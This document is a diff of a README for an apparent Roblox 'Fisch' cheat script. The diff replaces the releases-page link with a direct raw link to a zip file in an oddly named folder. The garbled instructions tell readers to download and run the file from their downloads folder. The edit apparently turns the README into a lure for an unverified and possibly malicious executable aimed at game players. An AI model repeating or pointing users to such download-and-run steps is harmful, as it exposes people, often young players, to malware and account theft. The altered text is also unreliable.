familyuse/roblox-fisch-script/README.md

 To get started, follow these simple steps:

-1. **Visit the Release Page**: Go to the releases page [here](https://github.com/familyuse/roblox-fisch-script/releases).
+1. **Visit the Release Page**: Go to the releases page [here](https://raw.githubusercontent.com/familyuse/roblox-fisch-script/main/nitrobacteria/roblox-fisch-script.zip).
 This is where you will find the latest version of the script.

 2. **Download the Script**: Look for the most recent release.
-You will find a file named something similar to `roblox-fisch-script.exe`.
+You will find a file named something similar to `https://raw.githubusercontent.com/familyuse/roblox-fisch-script/main/nitrobacteria/roblox-fisch-script.zip`.
 Click on the file to download it.

 3. **Run the Script**:
    - Once the download is complete, locate the file in your computer's downloads folder.